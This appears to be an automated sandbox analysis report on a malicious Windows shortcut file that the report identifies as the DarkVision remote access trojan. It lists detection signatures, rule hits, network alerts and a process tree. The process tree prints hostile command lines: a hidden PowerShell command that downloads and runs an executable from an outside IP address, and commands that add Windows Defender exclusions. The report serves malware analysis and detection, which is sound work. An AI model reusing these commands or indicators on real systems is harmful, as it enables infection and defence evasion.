Edit tour
Windows
Analysis Report
009274965.lnk
Overview
General Information
Detection
DarkVision Rat
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to evade debugger and weak emulator (self modifying code)
Uses dynamic DNS services
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to communicate with device drivers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 3920 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -command " & { Invoke -WebReques t -Uri htt p://87.120 .113.91/im age.exe -O utFile C:\ Users\user \AppData\L ocal\Temp\ file.exe; Start-Proc ess 'C:\Us ers\user\A ppData\Loc al\Temp\fi le.exe' }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - file.exe (PID: 5620 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\file.e xe" MD5: D37285BF0331C7514E5E4CEC0FBE647C) - cmd.exe (PID: 3900 cmdline:
cmd.exe /c powershel l.exe Add- MpPreferen ce -Exclus ionPath 'C :\ProgramD ata\window s' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3404 cmdline:
powershell .exe Add-M pPreferenc e -Exclusi onPath 'C: \ProgramDa ta\windows ' MD5: 04029E121A0CFA5991749937DD22A1D9) - windows.exe (PID: 5628 cmdline:
"C:\Progra mData\wind ows\window s.exe" {05 756468-643 4-465A-931 3-8CAA82F8 57B2} MD5: D37285BF0331C7514E5E4CEC0FBE647C) - cmd.exe (PID: 7296 cmdline:
cmd.exe /c powershel l.exe Add- MpPreferen ce -Exclus ionPath 'C :\ProgramD ata\window s' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7304 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7340 cmdline:
powershell .exe Add-M pPreferenc e -Exclusi onPath 'C: \ProgramDa ta\windows ' MD5: 04029E121A0CFA5991749937DD22A1D9) - explorer.exe (PID: 7428 cmdline:
"C:\Window s\explorer .exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
- cmd.exe (PID: 7796 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Prog ramData\{4 3FE0128-81 95-4F1C-AD AF-97085D2 B6441}\{32 3467A8-45D A-47D5-AF5 3-60BD8A3D 7BCB}.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7856 cmdline:
cmd /c sta rt "" "C:\ ProgramDat a\windows\ windows.ex e" {E18E5D B7-AE08-4C 9E-ABE2-E8 2E89BF186D } MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - windows.exe (PID: 7872 cmdline:
"C:\Progra mData\wind ows\window s.exe" {E1 8E5DB7-AE0 8-4C9E-ABE 2-E82E89BF 186D} MD5: D37285BF0331C7514E5E4CEC0FBE647C)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Click to see the 1 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Click to see the 27 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Click to see the 16 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-31T09:28:40.039293+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:28:41.947167+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:28:42.824625+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59255 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:28:43.631999+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59256 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:28:44.432792+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59257 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:28:45.213759+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59258 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:29:32.455077+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59357 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:29:33.981907+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59368 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:29:34.769417+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59374 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:29:35.560094+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59380 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:29:36.386881+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59386 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:29:37.179091+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59392 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:30:18.491262+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59629 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:30:20.012548+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59630 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:30:20.807189+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59631 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:30:21.665428+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59632 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:30:22.466740+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59633 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:30:23.241641+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.8 | 59634 | 87.121.86.214 | 3440 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-31T09:28:41.314009+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:29:33.524717+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.8 | 59357 | 87.121.86.214 | 3440 | TCP |
2024-12-31T09:30:19.569619+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.8 | 59629 | 87.121.86.214 | 3440 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-31T09:28:24.646706+0100 | 1810003 | 2 | Potentially Bad Traffic | 87.120.113.91 | 80 | 192.168.2.8 | 49708 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-31T09:28:24.646692+0100 | 1810000 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49708 | 87.120.113.91 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |